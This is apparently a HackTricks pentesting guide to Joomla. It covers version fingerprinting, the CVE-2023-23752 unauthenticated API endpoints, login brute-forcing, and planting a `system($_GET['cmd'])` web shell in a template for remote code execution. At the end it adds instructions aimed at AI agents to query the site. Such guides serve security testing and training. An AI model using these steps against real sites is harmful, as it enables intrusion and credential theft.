# Joomla

{% hint style="success" %}
Learn & practice AWS Hacking:<img src="/files/Xcgr3q6BP5MpWT3hTn6d" alt="" data-size="line">[**HackTricks Training AWS Red Team Expert (ARTE)**](https://training.hacktricks.xyz/courses/arte)<img src="/files/Xcgr3q6BP5MpWT3hTn6d" alt="" data-size="line">\
Learn & practice GCP Hacking: <img src="/files/aQnEyHWQGyok3qCc92qt" alt="" data-size="line">[**HackTricks Training GCP Red Team Expert (GRTE)**<img src="/files/aQnEyHWQGyok3qCc92qt" alt="" data-size="line">](https://training.hacktricks.xyz/courses/grte)

<details>

<summary>Support HackTricks</summary>

* Check the [**subscription plans**](https://github.com/sponsors/carlospolop)!
* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks_live)**.**
* **Share hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos.

</details>
{% endhint %}

### Joomla Statistics

Joomla collects some anonymous [usage statistics](https://developer.joomla.org/about/stats.html) such as the breakdown of Joomla, PHP and database versions and server operating systems in use on Joomla installations. This data can be queried via their public [API](https://developer.joomla.org/about/stats/api.html).

```bash
curl -s https://developer.joomla.org/stats/cms_version | python3 -m json.tool

{
    "data": {
        "cms_version": {
            "3.0": 0,
            "3.1": 0,
            "3.10": 6.33,
            "3.2": 0.01,
            "3.3": 0.02,
            "3.4": 0.05,
            "3.5": 12.24,
            "3.6": 22.85,
            "3.7": 7.99,
            "3.8": 17.72,
            "3.9": 27.24,
            "4.0": 3.21,
            "4.1": 1.53,
            "4.2": 0.82,
            "4.3": 0,
            "5.0": 0
        },
        "total": 2951032
    }
}
```

## Enumeration

### Discovery/Footprinting

* Check the **meta**

```bash
curl https://www.joomla.org/ | grep Joomla | grep generator

<meta name="generator" content="Joomla! - Open Source Content Management" />
```

* robots.txt

```
# If the Joomla site is installed within a folder
# eg www.example.com/joomla/ then the robots.txt file
# MUST be moved to the site root
# eg www.example.com/robots.txt
# AND the joomla folder name MUST be prefixed to all of the
# paths.
[...]
```

* README.txt

```
1- What is this?
	* This is a Joomla! installation/upgrade package to version 3.x
	* Joomla! Official site: https://www.joomla.org
	* Joomla! 3.9 version history - https://docs.joomla.org/Special:MyLanguage/Joomla_3.9_version_history
	* Detailed changes in the Changelog: https://github.com/joomla/joomla-cms/commits/staging
```

### Version

* In **/administrator/manifests/files/joomla.xml** you can see the version.
* In **/language/en-GB/en-GB.xml** you can get the version of Joomla.
* In **plugins/system/cache/cache.xml** you can see an approximate version.

### Automatic

```bash
droopescan scan joomla --url http://joomla-site.local/
```

In[ **80,443 - Pentesting Web Methodology is a section about CMS scanners**](/hacktricks/network-services-pentesting/pentesting-web.md#cms-scanners) that can scan Joomla.

### API Unauthenticated Information Disclosure:

Versions From 4.0.0 to 4.2.7 are vulnerable to Unauthenticated information disclosure (CVE-2023-23752) that will dump creds and other information.

* Users: `http://<host>/api/v1/users?public=true`
* Config File: `http://<host>/api/index.php/v1/config/application?public=true`

**MSF Module**: `scanner/http/joomla_api_improper_access_checks` or ruby script: [51334](https://www.exploit-db.com/exploits/51334)

### Brute-Force

You can use this [script](https://github.com/ajnik/joomla-bruteforce) to attempt to brute force the login.

```shell-session
sudo python3 joomla-brute.py -u http://joomla-site.local/ -w /usr/share/metasploit-framework/data/wordlists/http_default_pass.txt -usr admin
 
admin:admin
```

## RCE

If you managed to get **admin credentials** you can **RCE inside of it** by adding a snippet of **PHP code** to gain **RCE**. We can do this by **customizing** a **template**.

1. **Click** on **`Templates`** on the bottom left under `Configuration` to pull up the templates menu.
2. **Click** on a **template** name. Let's choose **`protostar`** under the `Template` column header. This will bring us to the **`Templates: Customise`** page.
3. Finally, you can click on a page to pull up the **page source**. Let's choose the **`error.php`** page. We'll add a **PHP one-liner to gain code execution** as follows:
   1. **`system($_GET['cmd']);`**
4. **Save & Close**
5. `curl -s http://joomla-site.local/templates/protostar/error.php?cmd=id`

## From XSS to RCE

* [**JoomSploit**](https://github.com/nowak0x01/JoomSploit): Joomla Exploitation Script that **elevate XSS to RCE or Others Critical Vulnerabilities**. For more info check [**this post**](https://nowak0x01.github.io/papers/76bc0832a8f682a7e0ed921627f85d1d.html). It provides **support for Joomla Versions 5.X.X, 4.X.X, and 3.X.X, and allows to:**
  * ***Privilege Escalation:*** Creates an user in Joomla.
  * ***(RCE) Built-In Templates Edit:*** Edit a Built-In Templates in Joomla.
  * ***(Custom) Custom Exploits:*** Custom Exploits for Third-Party Joomla Plugins.

{% hint style="success" %}
Learn & practice AWS Hacking:<img src="/files/Xcgr3q6BP5MpWT3hTn6d" alt="" data-size="line">[**HackTricks Training AWS Red Team Expert (ARTE)**](https://training.hacktricks.xyz/courses/arte)<img src="/files/Xcgr3q6BP5MpWT3hTn6d" alt="" data-size="line">\
Learn & practice GCP Hacking: <img src="/files/aQnEyHWQGyok3qCc92qt" alt="" data-size="line">[**HackTricks Training GCP Red Team Expert (GRTE)**<img src="/files/aQnEyHWQGyok3qCc92qt" alt="" data-size="line">](https://training.hacktricks.xyz/courses/grte)

<details>

<summary>Support HackTricks</summary>

* Check the [**subscription plans**](https://github.com/sponsors/carlospolop)!
* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks_live)**.**
* **Share hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos.

</details>
{% endhint %}


---

# Agent Instructions: Querying This Documentation

If you need additional information that is not directly available in this page, you can query the documentation dynamically by asking a question.

Perform an HTTP GET request on the current page URL with the `ask` query parameter:

```
GET https://angelica.gitbook.io/hacktricks/network-services-pentesting/pentesting-web/joomla.md?ask=<question>
```

The question should be specific, self-contained, and written in natural language.
The response will contain a direct answer to the question and relevant excerpts and sources from the documentation.

Use this mechanism when the answer is not explicitly present in the current page, you need clarification or additional context, or you want to retrieve related documentation sections.